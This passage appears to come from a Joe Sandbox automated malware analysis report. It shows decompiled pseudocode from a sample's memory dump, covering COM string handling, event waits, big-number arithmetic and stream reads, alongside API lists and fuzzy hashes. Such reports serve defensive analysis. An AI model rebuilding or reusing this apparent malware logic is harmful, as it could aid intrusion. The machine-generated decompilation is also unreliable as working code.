                						__imp__#2(0x2229284);
                						_v28 = _t57;
                						if(_t57 == 0) {
                							_t118 = 0x8007000e;
                						} else {
                							_t60 = _v32;
                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                							_t87 = __imp__#6;
                							_t118 = _t61;
                							if(_t118 >= 0) {
                								_t63 = _v24;
                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                								if(_t118 >= 0) {
                									_t130 = _v20;
                									if(_t130 != 0) {
                										_t67 = 3;
                										_v64 = _t67;
                										_v48 = _t67;
                										_v56 = 0;
                										_v40 = 0;
                										if(_t130 > 0) {
                											while(1) {
                												_t68 = _v24;
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												_t123 = _t123;
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                												if(_t118 < 0) {
                													goto L16;
                												}
                												_t70 = _v8;
                												_t109 =  *0x222a348; // 0x9ad5a8
                												_t28 = _t109 + 0x222b0e4; // 0x3050f1ff
                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                												if(_t118 >= 0) {
                													_t75 = _v16;
                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                													if(_t118 >= 0 && _v12 != 0) {
                														_t79 =  *0x222a348; // 0x9ad5a8
                														_t33 = _t79 + 0x222b078; // 0x76006f
                														if(lstrcmpW(_v12, _t33) == 0) {
                															_t83 = _v16;
                															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                														}
                														 *_t87(_v12);
                													}
                													_t77 = _v16;
                													 *((intOrPtr*)( *_t77 + 8))(_t77);
                												}
                												_t72 = _v8;
                												 *((intOrPtr*)( *_t72 + 8))(_t72);
                												_v40 = _v40 + 1;
                												if(_v40 < _v20) {
                													continue;
                												}
                												goto L16;
                											}
                										}
                									}
                								}
                								L16:
                								_t65 = _v24;
                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                							}
                							 *_t87(_v28);
                						}
                						_t58 = _v32;
                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                					}
                				}
                				return _t118;
                			}





































                0x02226ce4
                0x02226ced
                0x02226cee
                0x02226cf2
                0x02226cf8
                0x02226cfe
                0x02226d07
                0x02226d0d
                0x02226d17
                0x02226d19
                0x02226d1f
                0x02226d24
                0x02226d2f
                0x02226d35
                0x02226d3a
                0x02226e5c
                0x02226d40
                0x02226d40
                0x02226d4d
                0x02226d53
                0x02226d59
                0x02226d5d
                0x02226d63
                0x02226d70
                0x02226d74
                0x02226d7a
                0x02226d7d
                0x02226d85
                0x02226d86
                0x02226d8a
                0x02226d8e
                0x02226d91
                0x02226d94
                0x02226d9a
                0x02226da3
                0x02226da9
                0x02226daa
                0x02226dad
                0x02226dae
                0x02226daf
                0x02226db7
                0x02226db8
                0x02226db9
                0x02226dbb
                0x02226dbf
                0x02226dc3
                0x00000000
                0x00000000
                0x02226dc9
                0x02226dd2
                0x02226dd8
                0x02226de2
                0x02226de6
                0x02226de8
                0x02226df5
                0x02226df9
                0x02226e01
                0x02226e06
                0x02226e18
                0x02226e1a
                0x02226e20
                0x02226e20
                0x02226e29
                0x02226e29
                0x02226e2b
                0x02226e31
                0x02226e31
                0x02226e34
                0x02226e3a
                0x02226e3d
                0x02226e46
                0x00000000
                0x00000000
                0x00000000
                0x02226e46
                0x02226d9a
                0x02226d94
                0x02226d7d
                0x02226e4c
                0x02226e4c
                0x02226e52
                0x02226e52
                0x02226e58
                0x02226e58
                0x02226e61
                0x02226e67
                0x02226e67
                0x02226d24
                0x02226e70

                APIs
                • SysAllocString.OLEAUT32(02229284), ref: 02226D2F
                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02226E10
                • SysFreeString.OLEAUT32(00000000), ref: 02226E29
                • SysFreeString.OLEAUT32(?), ref: 02226E58
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: String$Free$Alloclstrcmp
                • String ID:
                • API String ID: 1885612795-0
                • Opcode ID: ab30162b212d3823ddacb2a348483d451588fc2867ee0db0349798e086926cba
                • Instruction ID: 5a1c3a96f78888cec18df29de26c6a822574451de74b136c5e865300b4082599
                • Opcode Fuzzy Hash: ab30162b212d3823ddacb2a348483d451588fc2867ee0db0349798e086926cba
                • Instruction Fuzzy Hash: FC516D76D00619EFCB11DFE8C488DAEB7BAFF88704B154584E915EB214D732AE45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(?), ref: 022259B8
                • SysFreeString.OLEAUT32(00000000), ref: 02225A9D
                  • Part of subcall function 02226CDF: SysAllocString.OLEAUT32(02229284), ref: 02226D2F
                • SafeArrayDestroy.OLEAUT32(00000000), ref: 02225AF0
                • SysFreeString.OLEAUT32(00000000), ref: 02225AFF
                  • Part of subcall function 022277E3: Sleep.KERNEL32(000001F4), ref: 0222782B
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: String$AllocFree$ArrayDestroySafeSleep
                • String ID:
                • API String ID: 3193056040-0
                • Opcode ID: 1fb14339688b98707f6b5a79e32c205510ca09a5ad8263037a30b0d2934d21f5
                • Instruction ID: 2f929b2f0608cfe66985d5771c97f6885b0f288e20662d3bdd05236d5e87b297
                • Opcode Fuzzy Hash: 1fb14339688b98707f6b5a79e32c205510ca09a5ad8263037a30b0d2934d21f5
                • Instruction Fuzzy Hash: 11519E35910619BFCB11CFE8C884A9EB7B6FF88704F258828E505DB214DB36ED19CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E02224781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				void _v156;
                				void _v428;
                				void* _t55;
                				unsigned int _t56;
                				signed int _t66;
                				signed int _t74;
                				void* _t76;
                				signed int _t79;
                				void* _t81;
                				void* _t92;
                				void* _t96;
                				signed int* _t99;
                				signed int _t101;
                				signed int _t103;
                				void* _t107;
                
                				_t92 = _a12;
                				_t101 = __eax;
                				_t55 = E022261EF(_a16, _t92);
                				_t79 = _t55;
                				if(_t79 == 0) {
                					L18:
                					return _t55;
                				}
                				_t56 =  *(_t92 + _t79 * 4 - 4);
                				_t81 = 0;
                				_t96 = 0x20;
                				if(_t56 == 0) {
                					L4:
                					_t97 = _t96 - _t81;
                					_v12 = _t96 - _t81;
                					E02226725(_t79,  &_v428);
                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02227477(_t101,  &_v428, _a8, _t96 - _t81);
                					E02227477(_t79,  &_v156, _a12, _t97);
                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                					_t66 = E02226725(_t101, 0x222a1d0);
                					_t103 = _t101 - _t79;
                					_a8 = _t103;
                					if(_t103 < 0) {
                						L17:
                						E02226725(_a16, _a4);
                						E02227894(_t79,  &_v428, _a4, _t97);
                						memset( &_v428, 0, 0x10c);
                						_t55 = memset( &_v156, 0, 0x84);
                						goto L18;
                					}
                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                					do {
                						if(_v8 != 0xffffffff) {
                							_push(1);
                							_push(0);
                							_push(0);
                							_push( *_t99);
                							L022282DA();
                							_t74 = _t66 +  *(_t99 - 4);
                							asm("adc edx, esi");
                							_push(0);
                							_push(_v8 + 1);
                							_push(_t92);
                							_push(_t74);
                							L022282D4();
                							if(_t92 > 0 || _t74 > 0xffffffff) {
                								_t74 = _t74 | 0xffffffff;
                								_v16 = _v16 & 0x00000000;
                							}
                						} else {
                							_t74 =  *_t99;
                						}
                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                						_a12 = _t74;
                						_t76 = E02225F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                						while(1) {
                							 *_t99 =  *_t99 - _t76;
                							if( *_t99 != 0) {
                								goto L14;
                							}
                							L13:
                							_t92 =  &_v156;
                							if(E02226E71(_t79, _t92, _t106) < 0) {
                								break;
                							}
                							L14:
                							_a12 = _a12 + 1;
                							_t76 = E022210A0(_t79,  &_v156, _t106, _t106);
                							 *_t99 =  *_t99 - _t76;
                							if( *_t99 != 0) {
                								goto L14;
                							}
                							goto L13;
                						}
                						_a8 = _a8 - 1;
                						_t66 = _a12;
                						_t99 = _t99 - 4;
                						 *(0x222a1d0 + _a8 * 4) = _t66;
                					} while (_a8 >= 0);
                					_t97 = _v12;
                					goto L17;
                				}
                				while(_t81 < _t96) {
                					_t81 = _t81 + 1;
                					_t56 = _t56 >> 1;
                					if(_t56 != 0) {
                						continue;
                					}
                					goto L4;
                				}
                				goto L4;
                			}





















                0x02224784
                0x02224790
                0x02224796
                0x0222479b
                0x0222479f
                0x02224911
                0x02224915
                0x02224915
                0x022247a5
                0x022247a9
                0x022247ad
                0x022247b0
                0x022247bb
                0x022247c1
                0x022247c6
                0x022247c9
                0x022247e3
                0x022247f2
                0x022247fe
                0x02224808
                0x0222480d
                0x0222480f
                0x02224812
                0x022248c9
                0x022248cf
                0x022248e0
                0x022248f3
                0x02224909
                0x00000000
                0x0222490e
                0x0222481b
                0x02224822
                0x02224826
                0x0222482c
                0x0222482e
                0x02224830
                0x02224832
                0x02224834
                0x0222483e
                0x02224843
                0x02224845
                0x02224847
                0x02224848
                0x02224849
                0x0222484a
                0x02224851
                0x02224858
                0x0222485b
                0x0222485b
                0x02224828
                0x02224828
                0x02224828
                0x02224863
                0x0222486b
                0x02224877
                0x0222487c
                0x0222487c
                0x02224881
                0x00000000
                0x00000000
                0x02224883
                0x02224886
                0x02224893
                0x00000000
                0x00000000
                0x02224895
                0x02224895
                0x022248a2
                0x0222487c
                0x02224881
                0x00000000
                0x00000000
                0x00000000
                0x02224881
                0x022248ac
                0x022248af
                0x022248b2
                0x022248b9
                0x022248b9
                0x022248c6
                0x00000000
                0x022248c6
                0x022247b2
                0x022247b6
                0x022247b7
                0x022247b9
                0x00000000
                0x00000000
                0x00000000
                0x022247b9
                0x00000000

                APIs
                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02224834
                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0222484A
                • memset.NTDLL ref: 022248F3
                • memset.NTDLL ref: 02224909
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: memset$_allmul_aulldiv
                • String ID:
                • API String ID: 3041852380-0
                • Opcode ID: f8500cef9ff2bc0171a30ee90bdda005f40ed21fde4d5e9122e98b398c3df4c2
                • Instruction ID: 3bc5173a889caf887c276d31a3fe6dbc82491aaef8d7c31a6bf55f3e0e3ad6ba
                • Opcode Fuzzy Hash: f8500cef9ff2bc0171a30ee90bdda005f40ed21fde4d5e9122e98b398c3df4c2
                • Instruction Fuzzy Hash: B441D531A20269BBDB10AFE8DC40BEE7776EF45310F004569F919A7284EB71AE58CF51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E0222454F(void* __eax, void* __ecx) {
                				char _v8;
                				void* _v12;
                				intOrPtr _v16;
                				char _v20;
                				void* __esi;
                				intOrPtr _t36;
                				intOrPtr* _t37;
                				intOrPtr* _t39;
                				void* _t53;
                				long _t58;
                				void* _t59;
                
                				_t53 = __ecx;
                				_t59 = __eax;
                				_t58 = 0;
                				ResetEvent( *(__eax + 0x1c));
                				_push( &_v8);
                				_push(4);
                				_push( &_v20);
                				_push( *((intOrPtr*)(_t59 + 0x18)));
                				if( *0x222a160() != 0) {
                					L5:
                					if(_v8 == 0) {
                						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                						L21:
                						return _t58;
                					}
                					 *0x222a174(0, 1,  &_v12);
                					if(0 != 0) {
                						_t58 = 8;
                						goto L21;
                					}
                					_t36 = E022233DC(0x1000);
                					_v16 = _t36;
                					if(_t36 == 0) {
                						_t58 = 8;
                						L18:
                						_t37 = _v12;
                						 *((intOrPtr*)( *_t37 + 8))(_t37);
                						goto L21;
                					}
                					_push(0);
                					_push(_v8);
                					_push( &_v20);
                					while(1) {
                						_t39 = _v12;
                						_t56 =  *_t39;
                						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                						ResetEvent( *(_t59 + 0x1c));
                						_push( &_v8);
                						_push(0x1000);
                						_push(_v16);
                						_push( *((intOrPtr*)(_t59 + 0x18)));
                						if( *0x222a160() != 0) {
                							goto L13;
                						}
                						_t58 = GetLastError();
                						if(_t58 != 0x3e5) {
                							L15:
                							E022261DA(_v16);
                							if(_t58 == 0) {
                								_t58 = E02222B18(_v12, _t59);
                							}
                							goto L18;
                						}
                						_t58 = E022216B2( *(_t59 + 0x1c), _t56, 0xffffffff);
                						if(_t58 != 0) {
                							goto L15;
                						}
                						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                						if(_t58 != 0) {
                							goto L15;
                						}
                						L13:
                						_t58 = 0;
                						if(_v8 == 0) {
                							goto L15;
                						}
                						_push(0);
                						_push(_v8);
                						_push(_v16);
                					}
                				}
                				_t58 = GetLastError();
                				if(_t58 != 0x3e5) {
                					L4:
                					if(_t58 != 0) {
                						goto L21;
                					}
                					goto L5;
                				}
                				_t58 = E022216B2( *(_t59 + 0x1c), _t53, 0xffffffff);
                				if(_t58 != 0) {
                					goto L21;
                				}
                				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                				goto L4;
                			}














                0x0222454f
                0x0222455e
                0x02224563
                0x02224565
                0x0222456a
                0x0222456b
                0x02224570
                0x02224571
                0x0222457c
                0x022245ad
                0x022245b2
                0x02224675
                0x02224678
                0x0222467e
                0x0222467e
                0x022245bf
                0x022245c7
                0x02224672
                0x00000000
                0x02224672
                0x022245d2
                0x022245d7
                0x022245dc
                0x02224664
                0x02224665
                0x02224665
                0x0222466b
                0x00000000
                0x0222466b
                0x022245e2
                0x022245e4
                0x022245ea
                0x022245eb
                0x022245eb
                0x022245ee
                0x022245f1
                0x022245f7
                0x022245fc
                0x022245fd
                0x02224602
                0x02224605
                0x02224610
                0x00000000
                0x00000000
                0x02224618
                0x02224620
                0x02224649
                0x0222464c
                0x02224653
                0x0222465e
                0x0222465e
                0x00000000
                0x02224653
                0x0222462c
                0x02224630
                0x00000000
                0x00000000
                0x02224632
                0x02224637
                0x00000000
                0x00000000
                0x02224639
                0x02224639
                0x0222463e
                0x00000000
                0x00000000
                0x02224640
                0x02224641
                0x02224644
                0x02224644
                0x022245eb
                0x02224584
                0x0222458c
                0x022245a5
                0x022245a7
                0x00000000
                0x00000000
                0x00000000
                0x022245a7
                0x02224598
                0x0222459c
                0x00000000
                0x00000000
                0x022245a2
                0x00000000

                APIs
                • ResetEvent.KERNEL32(?), ref: 02224565
                • GetLastError.KERNEL32 ref: 0222457E
                  • Part of subcall function 022216B2: WaitForMultipleObjects.KERNEL32(00000002,02227C47,00000000,02227C47,?,?,?,02227C47,0000EA60), ref: 022216CD
                • ResetEvent.KERNEL32(?), ref: 022245F7
                • GetLastError.KERNEL32 ref: 02224612
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: ErrorEventLastReset$MultipleObjectsWait
                • String ID:
                • API String ID: 2394032930-0
                • Opcode ID: 80747420d4f67b86e5960c84d2e4e5ec48d84c9cca0abb35f5939728d033015a
                • Instruction ID: 57710eb3b298bf70c41bff449b0115cacaa87645bd541130531b93c0d3a5e6b3
                • Opcode Fuzzy Hash: 80747420d4f67b86e5960c84d2e4e5ec48d84c9cca0abb35f5939728d033015a
                • Instruction Fuzzy Hash: 2431F332A50225BBCB21AFE4DC44FBE77B9FF84360F110528E551A7194EB72E949CB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E022249D0(signed int _a4, signed int* _a8) {
                				void* __ecx;
                				void* __edi;
                				signed int _t6;
                				intOrPtr _t8;
                				intOrPtr _t12;
                				short* _t19;
                				void* _t25;
                				signed int* _t28;
                				CHAR* _t30;
                				long _t31;
                				intOrPtr* _t32;
                
                				_t6 =  *0x222a310; // 0xd448b889
                				_t32 = _a4;
                				_a4 = _t6 ^ 0x109a6410;
                				_t8 =  *0x222a348; // 0x9ad5a8
                				_t3 = _t8 + 0x222b7b4; // 0x61636f4c
                				_t25 = 0;
                				_t30 = E022274EC(_t3, 1);
                				if(_t30 != 0) {
                					_t25 = CreateEventA(0x222a34c, 1, 0, _t30);
                					E022261DA(_t30);
                				}
                				_t12 =  *0x222a2fc; // 0x2000000a
                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E022230D5() != 0) {
                					L12:
                					_t28 = _a8;
                					if(_t28 != 0) {
                						 *_t28 =  *_t28 | 0x00000001;
                					}
                					_t31 = E022237DF(_t32, 0);
                					if(_t31 == 0 && _t25 != 0) {
                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                					}
                					if(_t28 != 0 && _t31 != 0) {
                						 *_t28 =  *_t28 & 0xfffffffe;
                					}
                					goto L20;
                				} else {
                					_t19 =  *0x222a124( *_t32, 0x20);
                					if(_t19 != 0) {
                						 *_t19 = 0;
                						_t19 = _t19 + 2;
                					}
                					_t31 = E022223C4(0,  *_t32, _t19, 0);
                					if(_t31 == 0) {
                						if(_t25 == 0) {
                							L22:
                							return _t31;
                						}
                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                						if(_t31 == 0) {
                							L20:
                							if(_t25 != 0) {
                								CloseHandle(_t25);
                							}
                							goto L22;
                						}
                					}
                					goto L12;
                				}
                			}














                0x022249d1
                0x022249d8
                0x022249e2
                0x022249e6
                0x022249ec
                0x022249fb
                0x02224a02
                0x02224a06
                0x02224a18
                0x02224a1a
                0x02224a1a
                0x02224a1f
                0x02224a26
                0x02224a7d
                0x02224a7d
                0x02224a83
                0x02224a85
                0x02224a85
                0x02224a8f
                0x02224a93
                0x02224aa5
                0x02224aa5
                0x02224aa9
                0x02224aaf
                0x02224aaf
                0x00000000
                0x02224a3f
                0x02224a44
                0x02224a4c
                0x02224a50
                0x02224a54
                0x02224a54
                0x02224a61
                0x02224a65
                0x02224a69
                0x02224abe
                0x02224ac4
                0x02224ac4
                0x02224a77
                0x02224a7b
                0x02224ab2
                0x02224ab4
                0x02224ab7
                0x02224ab7
                0x00000000
                0x02224ab4
                0x02224a7b
                0x00000000
                0x02224a65

                APIs
                  • Part of subcall function 022274EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,02BD9E18,00000000,?,?,43175AC3,00000005,0222A00C,4D283A53,?,?), ref: 02227522
                  • Part of subcall function 022274EC: lstrcpy.KERNEL32(00000000,00000000), ref: 02227546
                  • Part of subcall function 022274EC: lstrcat.KERNEL32(00000000,00000000), ref: 0222754E
                • CreateEventA.KERNEL32(0222A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,02226A95,?,?,?), ref: 02224A11
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                • WaitForSingleObject.KERNEL32(00000000,00004E20,02226A95,00000000,00000000,?,00000000,?,02226A95,?,?,?), ref: 02224A71
                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,02226A95,?,?,?), ref: 02224A9F
                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,02226A95,?,?,?), ref: 02224AB7
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 73268831-0
                • Opcode ID: 90c62d77183cc1ad4400917f9aca90e855c1b669ca9dc3a7be1c59fcd9f6d505
                • Instruction ID: 5c05800794f3043bd555f248af8fd1f02cc88acbda78b187ea13a9f2522bba3f
                • Opcode Fuzzy Hash: 90c62d77183cc1ad4400917f9aca90e855c1b669ca9dc3a7be1c59fcd9f6d505
                • Instruction Fuzzy Hash: 782109329603327BC731AAE49C68AAF73E9EB44718F161615FD41DB148DB2BC84CDB58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E022269E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                				intOrPtr _v12;
                				void* _v16;
                				void* _v28;
                				char _v32;
                				void* __esi;
                				void* _t29;
                				void* _t38;
                				signed int* _t39;
                				void* _t40;
                
                				_t36 = __ecx;
                				_v32 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v12 = _a4;
                				_t38 = E02222A3D(__ecx,  &_v32);
                				if(_t38 != 0) {
                					L12:
                					_t39 = _a8;
                					L13:
                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                						_t23 =  &(_t39[1]);
                						if(_t39[1] != 0) {
                							E022228B3(_t23);
                						}
                					}
                					return _t38;
                				}
                				if(E02226ADC(0x40,  &_v16) != 0) {
                					_v16 = 0;
                				}
                				_t40 = CreateEventA(0x222a34c, 1, 0,  *0x222a3e4);
                				if(_t40 != 0) {
                					SetEvent(_t40);
                					Sleep(0xbb8);
                					CloseHandle(_t40);
                				}
                				_push( &_v32);
                				if(_a12 == 0) {
                					_t29 = E02225704(_t36);
                				} else {
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_t29 = E02224C94(_t36);
                				}
                				_t41 = _v16;
                				_t38 = _t29;
                				if(_v16 != 0) {
                					E02227220(_t41);
                				}
                				if(_t38 != 0) {
                					goto L12;
                				} else {
                					_t39 = _a8;
                					_t38 = E022249D0( &_v32, _t39);
                					goto L13;
                				}
                			}












                0x022269e6
                0x022269f3
                0x022269f9
                0x022269fa
                0x022269fb
                0x022269fc
                0x022269fd
                0x02226a01
                0x02226a0d
                0x02226a11
                0x02226a99
                0x02226a99
                0x02226a9c
                0x02226a9e
                0x02226aa6
                0x02226aac
                0x02226aaf
                0x02226aaf
                0x02226aac
                0x02226aba
                0x02226aba
                0x02226a24
                0x02226a26
                0x02226a26
                0x02226a3d
                0x02226a41
                0x02226a44
                0x02226a4f
                0x02226a56
                0x02226a56
                0x02226a5f
                0x02226a63
                0x02226a71
                0x02226a65
                0x02226a65
                0x02226a66
                0x02226a67
                0x02226a68
                0x02226a69
                0x02226a6a
                0x02226a6a
                0x02226a76
                0x02226a79
                0x02226a7d
                0x02226a7f
                0x02226a7f
                0x02226a86
                0x00000000
                0x02226a88
                0x02226a88
                0x02226a95
                0x00000000
                0x02226a95

                APIs
                • CreateEventA.KERNEL32(0222A34C,00000001,00000000,00000040,?,?,74D0F710,00000000,74D0F730), ref: 02226A37
                • SetEvent.KERNEL32(00000000), ref: 02226A44
                • Sleep.KERNEL32(00000BB8), ref: 02226A4F
                • CloseHandle.KERNEL32(00000000), ref: 02226A56
                  • Part of subcall function 02225704: WaitForSingleObject.KERNEL32(00000000,?,?,?,02226A76,?,02226A76,?,?,?,?,?,02226A76,?), ref: 022257DE
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                • String ID:
                • API String ID: 2559942907-0
                • Opcode ID: bf879626898b12d1a19f2f4192c0a0ea696fbd52eb3cd491be1a89ccb01a6ffc
                • Instruction ID: 2bbc6a98b55f30bbfce23ad9fd192ab74dd6710a061829a49dc5032d9748ef52
                • Opcode Fuzzy Hash: bf879626898b12d1a19f2f4192c0a0ea696fbd52eb3cd491be1a89ccb01a6ffc
                • Instruction Fuzzy Hash: 92215373D1023AFBDB20AFE494849FE77ADAB04314B158425EA11A7108D77B998D8BA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E02224461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                				intOrPtr _v8;
                				void* _v12;
                				void* _v16;
                				intOrPtr _t26;
                				intOrPtr* _t28;
                				intOrPtr _t31;
                				intOrPtr* _t32;
                				void* _t39;
                				int _t46;
                				intOrPtr* _t47;
                				int _t48;
                
                				_t47 = __eax;
                				_push( &_v12);
                				_push(__eax);
                				_t39 = 0;
                				_t46 = 0;
                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                				_v8 = _t26;
                				if(_t26 < 0) {
                					L13:
                					return _v8;
                				}
                				if(_v12 == 0) {
                					Sleep(0xc8);
                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                				}
                				if(_v8 >= _t39) {
                					_t28 = _v12;
                					if(_t28 != 0) {
                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                						_v8 = _t31;
                						if(_t31 >= 0) {
                							_t46 = lstrlenW(_v16);
                							if(_t46 != 0) {
                								_t46 = _t46 + 1;
                								_t48 = _t46 + _t46;
                								_t39 = E022233DC(_t48);
                								if(_t39 == 0) {
                									_v8 = 0x8007000e;
                								} else {
                									memcpy(_t39, _v16, _t48);
                								}
                								__imp__#6(_v16);
                							}
                						}
                						_t32 = _v12;
                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                					}
                					 *_a4 = _t39;
                					 *_a8 = _t46 + _t46;
                				}
                				goto L13;
                			}














                0x0222446d
                0x02224471
                0x02224472
                0x02224473
                0x02224475
                0x02224477
                0x0222447a
                0x0222447f
                0x02224516
                0x0222451d
                0x0222451d
                0x02224488
                0x0222448f
                0x0222449f
                0x0222449f
                0x022244a5
                0x022244a7
                0x022244ac
                0x022244b5
                0x022244bb
                0x022244c0
                0x022244cb
                0x022244cf
                0x022244d1
                0x022244d2
                0x022244db
                0x022244df
                0x022244f0
                0x022244e1
                0x022244e6
                0x022244eb
                0x022244fa
                0x022244fa
                0x022244cf
                0x02224500
                0x02224506
                0x02224506
                0x0222450f
                0x02224514
                0x02224514
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
